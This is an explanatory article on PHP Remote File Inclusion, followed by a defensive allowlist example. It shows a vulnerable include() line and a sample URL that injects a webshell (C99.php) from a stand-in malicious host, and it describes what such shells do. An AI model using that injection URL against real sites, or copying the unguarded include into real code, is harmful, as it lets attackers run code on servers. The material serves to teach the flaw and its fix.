Information About Remote File Inclusion





HOW THE ATTACK WORKS

Remote File Inclusion (RFI) attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker gets his own code included at a point where the page expects to load one of its own PHP files. For instance, a piece of vulnerable PHP code would look like this:

''include($title . '/archive.php');''

A page containing this line of PHP code is reached through a URL like the following example:

''www.vulnerable.website.com/index.php?title=archive.php?''

Because the $title variable is never explicitly defined in the script, an attacker can insert the location of a malicious file into the URL and execute it on the target server, as in this example:

''www.vulnerable.website.com/index.php?title=http://www.malicious.code.com/C99.php?archive.php''

The include function above instructs the server to retrieve archive.php and run its code. The code does not say what to do if the user changes archive.php to a file of his own, so the script runs whatever file archive.php is replaced with. In this case, the script would execute the malicious file, http://www.malicious.code.com/C99.php.

This allows the attacker to include any remote file of his choice simply by editing the URL. Attackers commonly include a malicious PHP script called a webshell, also known as a c99 shell or PHP shell. A webshell can display the files and folders on the server and can edit, add or delete files, among other tasks. Potentially, the attacker can use the webshell to gain administrator-level, or root, access on the server.


WHY THE ATTACK WORKS

RFI attacks are possible because of a PHP configuration flag called register_globals. register_globals automatically defines variables in the script from the parameters entered in the page URL. In this example, the $title variable will automatically be filled with http://www.malicious.code.com/C99.php?archive.php before the script is executed. Because of this security vulnerability, register_globals is set to OFF by default on newer servers.
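
One way to close the hole described above, as an added example that is not part of the original article: the title value is read explicitly and used only as a key into a fixed list of local files, so a URL in that parameter is rejected instead of included. The page names, the pages/ directory and the helper names resolve_page and remote_include_enabled are assumptions for illustration; allow_url_include is the PHP setting that controls whether include accepts URLs.

```php
<?php
declare(strict_types=1);

// Added example, not from the original page. The page names and the
// pages/ directory are assumptions made for illustration.
const PAGES = [
    'archive' => 'archive.php',
    'contact' => 'contact.php',
];

/**
 * Map the user-supplied "title" value to a local file, or null if it is
 * not on the allowlist. The value is only used as an array key, so it can
 * never become part of the path or URL handed to include.
 */
function resolve_page($requested, string $baseDir): ?string
{
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return rtrim($baseDir, '/') . '/' . PAGES[$requested];
}

/** True if this PHP configuration would let include fetch remote URLs. */
function remote_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Constructed sample values for the "title" parameter, including the two
// values that appear in the URLs shown in this article.
$samples = [
    'archive',
    'archive.php?',
    'http://www.malicious.code.com/C99.php?archive.php',
    ['archive'], // title[]=archive arrives as an array, not a string
];

foreach ($samples as $value) {
    $path = resolve_page($value, __DIR__ . '/pages');
    printf("%-52s => %s\n",
        json_encode($value, JSON_UNESCAPED_SLASHES), $path ?? 'rejected');
}
printf("allow_url_include enabled: %s\n", remote_include_enabled() ? 'yes' : 'no');

// In the real handler, read $_GET explicitly (never rely on register_globals):
//   $path = resolve_page($_GET['title'] ?? 'archive', __DIR__ . '/pages');
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;
```

Only the exact key archive resolves to a file; every other sample, including the remote URL, is rejected before include is ever reached.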


SEE ALSO

Code Injection


LINKS

PHP: include()

PHP: Using Register Globals

PHP: Filesystem Functions: allow-url-fopen